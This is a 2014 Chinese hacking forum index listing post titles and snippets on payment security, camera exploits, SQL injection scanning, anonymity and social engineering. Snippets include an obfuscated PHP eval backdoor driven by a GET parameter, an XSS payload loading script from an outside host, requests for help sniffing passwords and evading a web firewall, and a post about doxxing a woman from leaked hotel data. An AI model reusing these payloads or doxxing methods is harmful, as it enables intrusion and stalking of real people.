个人认为微信支付存在的安全问题 p0di | 2014-02-14 16:50 在过去的一年中,互联网金融对的发展令人震jing。不论是网上银行、移动支付、三方支付、个人贷款都在迅速
【讨论】如何将该内网中内网的HTTP端口放在公网上
【求解】如何将该HTTP端口放在公网上 terrying | 2014-02-10 16:31 前几天在测试一个叫“IP摄像头”的软件,想想在一些废弃手机上可以用用,各种YY…… 该软件会在a
玩转 HID 门禁,RFID Hack
请允许我先说明一下本文纯属娱乐. 所涉及到的工具,软件都是可以轻易获取的. Just google it. 个别好学的小伙伴们有啥问题, 推荐去那个“专注研究无线类安全方面
科普:Burpsuite导出log配合Sqlmap批量扫描注入点
科普:Burpsuite导出log配合Sqlmap批量扫描注入点 动后河 (类的继承) | 2014-02-12 20:19 昨天google了,今天科普: 首先是burp设置记录
用SVG来找点乐子,Svg Fun Time Firefox Svg Vector
感觉挺好玩的就翻译了一下 求轻拍 >.< 原文链接:http://insert-script.blogspot.co.at/2014/02/svg-f
一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?
一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式? safe121 (Great Leader Kim Jong-Un General Long Live!!!) | 2014-02-12 07:37 话说今年春节的时候,老夫一基友同学回国过年了,他家
MySQL下的特殊蜜罐,逆向读取入侵者本地档案,Holy Shit!
MySQL下的特殊蜜罐 /fd (/proc) () | 2014-02-10 23:44 Slideshow: http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927 場景:假設你在渗透時發現了未移除的安装文件(install.php),然後你用裡面的數據庫配置遠程
Hikvision IP Cameras Multiple Vulnerabilities, 海康威视IP摄像机的多个漏洞
Hikvision IP Cameras Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ 1. Advisory Information Title:Hikvision IP Cameras Multiple Vulnerabilities Advisory ID:CORE-2013-0708 Advisory URL:http://www.cor
穷举海康威视监控密码的小程序,入侵海康威视IP摄像机
一个穷举海康威视监控密码的小程序,求修正。。求抛砖引玉 光的圆周率 (等级:二逼白帽子) | 2014-02-10 12:57 海康威视密码被修改了,只能到海康威视的登陆界面,又
已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性?
【求解】已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性? 光的圆周率 (等级:二逼白帽子) | 2014-02-09 15:51 RT,获取了某大型局域网的网络
看上一个妹子,只知道这么多该怎么继续往下社工
看上一个妹子,只知道这么多该怎么继续往下社 傻逼 (我是傻逼) | 2014-02-04 16:16 通过如家的裤子已经查出身份证号、户籍地址什么的了,也拿到证件照片了,也拿到Q
如何在不影响虚拟机运行的情况下绕过密码进虚拟机,hyper-V
如何在不影响虚拟机运行的情况下绕过密码进虚拟机,hyper-V 专业查水表 (我是"J.L"的代言人o(`ω′ )o) | 2014-02-06 13:05 撸到了一台服务器,里面有这
关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己
关于3G流量上网卡!(匿名上网) 永久VIP (我注册了一个账号,但他变成了VIP!) | 2014-02-06 07:03 3g上网卡卡托,类似于U盘一样的小玩意,几十几百的,
浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉
浅谈社工,欢迎讨论、补充 Black-Hole (我12破处) | 2014-02-03 15:03 首先,我不是社工大牛。我只是谈下我个人的观点。 我只提供几个思路给大家,欢迎补充。 在这里我把我们
【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工
新浪源:Markham Nolan 如何辨别网上信息真伪 优酷源:视频: [TED][中英字幕]2012Markham Nolan: 如何辨别网上信息真伪 【TED】Mar
我是如何让菜刀无视安全狗的!
我是如何让菜刀无视安全狗的! Sunshie (博客求大牛友链http://phpinfo.me) | 2014-02-01 13:24 需要准备的东西: ************************************** 原版菜刀一个 PHP+Apache运
探秘国际职业黑客:插U盘植入木马如同拍电影,做得上班族扮得007,社工大师
时至今日,一度为新新人类的“黑客”也算现代人认知中的熟练工种了,但他们能办到的事儿,却仍旧在刷新人们的认知底线,比如本周的全国网速大抽风,据
为什么诈骗短信看上去那么弱智?
XX集团举行三十周年大庆典,您的手机号码获得了20万大奖。 爸我在外嫖娼被抓手机被没收,快汇5万保释费到XX。 相信用过手机的人都收到过类似的短
过滤了符号 \ 和 / 该如何绕过进行 XSS 攻击?
过滤了符号 \ 和 / 该如何绕过进行 XSS 攻击? 超威蓝猫 () | 2014-01-25 15:43 传入 <script src="//xss.tw/4091"></script> 输出 <script src="xss.tw4091"><script> 求大牛支招。 [原文
求助加密代码解密!!!比较另类的“加密”一句话木马后门……
求助加密代码解密!!! HK骚年 | 2014-01-26 14:46 帽子们,谁知道这是什么加密方式,求解密。或者给加密方式、 eval(siGnjy(passport_decrypt("ByMAUQdaUyUAWVUsU3YGaFBFVQIBNgQkDE1SVQdmVhVUdldhB1UGcAxwVFFTMwA+BiFXF1YYVzoJVAI+DDwBMAdkAFIHRVMZAF5VSVN9BhZQMlVmAWMENgxEUk4HGFYYVFBXCgd6BlMMSFRtUzUAJQYtV2JWOVceCWgCGwxwAS0HNAAyB3lTYQBOVWZTUAYXUDtVBQFKBDoMQlJxByZWP1RLVwMHLwZUDHJUXlM3ABMGB1cHVgZXbgktAgUMFAFUBzMANwdzUysAaFVyU2AGbFBNVRkBYAR7DHdSPQcdVhVUTFc5B3gGVwx5VDVTQwAbBmRXaVZiVzQJZQI3DBUBVwcuADQHalM+AHdVSVNJBi1QYFU3AWoESgx2UlMHJ1YCVEJXOQdpBlYMS1RvUzIAZQYaVwhWBVdpCTsCYQwTAWQHHwAoB1NTAQAmVW1TKgZxUDNVGQFmBGQMflJhBwVWOFRAVwYHMgZlDHFUZFNoADUGBFdgVjZXNwlVAjQMHAFPBzIAdAd5U2UAXlV/U1MGdVBWVRgBUwRkDGVSRAc+VjtUS1caBzMGcgxSVEJTSgALBmBXe1YhVwkJagI9DC8BQwcjAGAHNVNiAEhVT1NuBiJQVFVmAXMEYgxFUl8HFlYAVHdXPQdKBnwMQFRkU0oALgY2VzpWD1dsCWACFAwsAVYHMQBqB1dTIgB5VWBTMgZiUDtVEwFABFYMaVJHBydWNFRUVxIHOAZhDGhURFM3ACkGelcXVhtXPwlxAnoMPgEzBzsAcwdFUyEAYlVQU08GFVBbVSoBQQQ8DGNSfQcSViJUalciBzgGRQxmVERTfwBzBgFXGFYfVwsJUwIMDBIBNgcCAFMHeFMTAD1VKFNfBh1QO1U+AToEVQw3UlIHFlYiVEFXOgdMBlMMalQ1U2MAJgZtVwRWOlc2CW8CNgxuAU8HHAA3B3hTKAB5VSxTUwYKUFFVZwFSBGkMVVIwBx5WM1QwV2gHTAZ+DHlUcFMyABoGbFc0VgRXJgk1Aj4MGAFwBycAYwdrUwMAYVUwU1EGYlBOVTMBeARrDEBSawcgVjRUbVcJB0IGUwxUVHFTSQAIBgBXPFYWVw4JYwI2DDIBdwc7AGYHMlM0AHdVMVNUBh9QTlUKAS0ERgwzUm8HBFY6VHRXJAdFBnwMTlRyU3UAPwYwVylWG1cMCWsCPAwDAU8HNAB+B1dTEwB8VWVTbgYiUDFVFgFHBHwMVlJ8Bx1WOFRPVwgHTAZoDHlUf1N9AB4GAVcUVhBXGAlVAhwMaAF2BzMAYQdaUyEAYlVVU3cGC1AwVWYBawQ9DEVSbwchVhZURVdoB0sGagx3VFBTMAA6BjJXJFZiV28JdwIvDBMBVAcbAHEHTlM1AGJVX1NgBgNQRlUjAUwESwxmUm8HJlYwVE9XIQdqBjAMalRcU0QAaQYfVztWLFclCUgCEQwJATEHHwBQB0lTFgBsVV1TQAY1UHBVZQFgBF0MMFJzBzJWM1RTVyoHUQYwDHBUdFNAAD4GNFcaVg1XCwlOAgcMHwE1B2QAPgdmUzMAOFVVU2oGHVBPVR8BRgR/DEpSQwcmVhJUM1cKBzIGVQxtVG9TRAATBjBXNVYAVx0JMwIvDGIBKQc1AG0HOFNgAEtVTlNrBjZQaFU6AXIEdww1Un0HGlZiVEJXOAdBBjAMdlReU0gANwYNVxxWNlcTCS0CGQwNAVUHEQBkB3pTJQBHVXNTfQYJUDtVAAFsBFsMbFJzBxNWYFRcV2UHOAZVDHZUN1NrAGwGPVdkVjdXCgkyAhkMOAFLBxgASwd1U2UAeVV3U3MGMlBMVSABLQRpDGBSXwc8Vj1UaFciB2cGMgxAVClTNAA5Bn5XCFYAVxsJMwI0DD0BXAcnAHAHVVM6AFpVRFNRBmlQSVU0AWQEewxBUkwHG1YVVFNXCAdtBnwMMVRWU2gAMgYmV3tWIVcICTUCYwx0AX4HPgBMB0JTfgBAVXVTMgZvUDZVNwFwBHYMa1JLBxNWJFRmVzYHOQZ8DGVUQVN3AD4GD1dpVmFXBgkpAjMMCwFFB3wANAdwUxcAJlVrU2QGClBmVR0BQwR6DEFSNAc3VjZUU1cXB3oGZgxuVDRTLgAJBmVXGVYDVw8JMAI3DB0BcgclAD4HZFMjAGxVNFM0BjFQc1UKAUgEegxiUn0HAFZmVEVXBwczBjUMVFRkU24APQYxVzxWA1cYCTICIgw0AVAHAQBLB3VTIAAmVU1TRgYSUFlVAwF7BDwMZVIxB3tWNVRUVzgHQQZ0DDBUU1N2ACsGD1cpVh1XdwltAgQMbwF+BzAAcgdnUyQAIlUwU3YGC1BIVWcBZwRqDGtSdgc+ViFUYVc8B0EGaAxKVE1TaQAPBgNXClYMVwYJWgIEDB0BSQcEAEsHQlM2AEBVclNjBhFQT1UEAVYEWgwoUlAHO1YzVDRXYgduBkMMcVRAU2MAaQZ6Vz9WMVcRCUQCLAwXAUoHMgBCB2hTegBjVV5TfQYdUEFVEwFQBF4MQlJrBxFWM1RXVyUHRAZDDGNUUFNpAGoGBFcgVmFXFAlXAjgMCQFPBycAcgdGUycAV1VwU2MGKlBpVSYBSwQ2DGFSPQcDVhJUaldnBy8GUQx2VERTcQA6BgxXB1ZkVxIJaQIYDBkBTwcBAH4HOFMIAGpVS1N9BiJQVlU7AXUESwxVUk4HFlYIVEFXMQdIBjAMTFRhUyoADwY/Vx9WIVcOCVUCBwwuAXQHYABOB1ZTHAB+VWJTMQYrUEdVNgFrBHwMblJPBzxWaVQ1VxcHawZnDHhUfFNUAC8GFFchVgNXZQk3AhcMNwFlBw8ASQdUUxoAV1VNU3QGb1BnVRsBYwRhDG9ScgdlVidUflcjBzgGYAxGVDZTXQA9Bn5XJ1ZhVxsJbQJjDD4BSAcDAEsHMlMfAEtVRFNDBh9QSFUBAU4ETQxdUlwHHVY7VGpXHgdGBm4MVFRPU1wAOgZlVyRWLFcRCTECPwwCAW8HfABSB3JTJgBDVWFTNQY1UHpVCwFuBFgMMVIyBxxWZFRcVwAHSQYxDFRUflNBACQGBVckViFXEQlrAgQMCgEwB28AZAdBUygAf1VMU3UGI1BHVRwBcARtDF5SSgcnVmhUQ1c6B08GSwx3VGdTMgA6BiRXKVYXVzEJSAIbDAsBagcfAHMHZ1MgAFtVU1N9BhJQZ1UkAVQEewxLUk4HaVY4VGZXCgcyBlEMeVRWU0kAbgZnV2lWAVcICUkCGgwXAX8HEwBCBzZTHABkVVdTSAYKUElVeQFDBG4Ma1JgByNWK1RSV2EHcwZKDEJUb1NpAGkGEFc6ViJXbgk7AiAMCQFrBzIAaAdZUx8AJlVpU1AGH1BuVQABUwRNDHdSTgdnVn5UTVc6BzMGUwxYVEBTQQAaBhFXGFYlVzcJVQI4DAkBXAcTAEEHdVMyAEVVLFM8BjJQQlUQATcETAx0Ul0HHVYlVDBXEQdSBm4MUlQ1Uy4AEAYbVxZWJlceCVoCAQwCAVIHJABRB0RTHwBIVUJTXQYzUDZVKwFtBEEMMFJwBz5WJlRJVzkHRgZQDElUQlNTABEGG1cVVg9XKwlKAmAMGQFOBzAAUAczUzQAZFVkU10GC1BkVTYBSwRoDGJSXAcCVmJUT1coB1EGVwx7VDBTMAAsBgNXFlY4VxgJcQJiDD0BcgdvAEgHWFM3ACJVKFNnBjZQNVVqAWsEOwx2UjwHNlYhVF5XAAdUBmYMe1RRU28ALQZ+VwRWMFcICVECZgw0AU4HZABIB0hTGwB6VXJTVAY5UEhVNQFkBD4MXVI8BxNWI1QzVz4HRwZUDGtUX1NxAC4GZVcdVh5XEglqAjMMPgFMBz0AUwc1Uz8AblVxU2IGdVAoVR4BYARnDEVSZgcyVmNURlcmB0IGQgxKVG5TQgArBjhXFlYtVx4JVAJsDDQBSAcVAE0HTlMCAFdVdlNLBmJQQVUdAWwETAxgUnYHaFY2VGtXYgd6BisMb1R/U0wADgY2V2VWbVdzCWUCEgwrAXMHEAByB0VTHABaVShTKgYjUEtVJwFLBGMMTVJiB2FWP1RwVxgHMgZtDDNUfFNfADsGGFcAVmJXJQlIAjAMGQFKBzkAdAdVUyIARlVDU3AGaVAzVTEBVAQ8DERSdQcxVhJUcFc7B1UGcAxZVFxTfQAMBh5XN1ZkVx0JUAJmDBkBYwcSAH0HU1MdAGdVQ1NhBg1QTFUhAWAEOQx0UjYHZFZpVFZXFwdzBk4MRlQ0UzwALQYUVwRWYFcOCVACHww5AU4HGwBBBzlTJgBoVUBTbwY1UGdVIwFRBG0MY1JtBwRWFFRlVwYHNgZGDGJUT1MzACoGA1c0VhpXBQlyAmcMNgFpBy8ATQdKUyMAQlU/UyoGdVBCVTUBPwQy",$_GET["c"])));} [原文地址] 各种吐槽: 1# RedFree (?1:1 1-1-1112 |※(器杀制自)
【火星帖】关于这种类似NOSQL数据库技术,一直不明白是什么,望赐教!
关于这种类似NOSQL数据库技术,一直不明白是什么,望赐教! 神牛 | 2014-01-26 21:24 如下图所示,普遍出现于一些小型asp网站,没有假设数据库,用asp来内
俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据
你知道在互联网的黑暗角落有人正在监视你么?事实不是所有人都被监视。不过这次我们要黑的不是NSA不是Google也不是你的宽带服务商。这次的监
保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹
关于tor和mac地址的疑问,各位进来讨论一下。 vakin | 2014-01-23 18:12 首先 @ 一下这方面的专家 @safe121 @clzzy vpn(公共)+Tor这种情况下,会存在在vpn端给抓包分
XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录
XX域名商实战 小鱼倪 (永远的社工 www.lq-e.cn) | 2014-01-24 09:50 看见乌云的大牛,小妹子第一次发帖....原创帖子,拒绝盗版 ================我是淫荡的
黑阔大牛来说一说切实可行的匿名上网方法
黑阔大牛来说一说切实可行的匿名上网 clzzy (南无阿弥陀佛) | 2014-01-21 11:43 说到保护隐私,匿名上网,乱七八糟方法很多,要么过于繁琐实际操作难度很大,要么不安全
2000万条酒店开房数据泄露 男子婚事被搅黄
2000万条酒店数据“曝光”,男子频接冒充熟人诈骗电话,被迫到派出所改姓,之后决定维权。 为全国4500多家酒店提供网络服务的浙江慧达驿站网络
1月21日DNS网络大规模故障的事故原因,全国域名被劫持到65.49.2.178的分析
事件:全国范围出现大规模DNS域名解析故障!很多网站被解析到65.49.2.178上! 从[紧急通知]国内互联网根域出现重大故障 已持续数十分钟
全国范围出现大规模DNS域名解析故障!很多网站被解析到65.49.2.178上!
#DNSPod通知#国内所有通用顶级域的根出现异常,我们已联系相关机构协调处理,进一步信息,请随时关注官方微博。 加速乐官网:根据大量用户反馈
xss玩转第三方微信公众平台的姿势!
xss玩转第三方微信公众平台的姿势! 苦战 | 2014-01-20 09:47 昨晚躺床上突然想到的 既然有基友玩微信注入,那是不是微信也能玩XSS,就有了这个姿势~ 首先见框就
潜入蓝翔技校二十天,调查蓝翔是不是真的有黑客
2013年4月,我报名进入蓝翔技校,在计算机系网络技术专业学习了近二十天。 体验见这篇发表在时尚先生杂志上的文章。 另外,美容美发系的学习体验,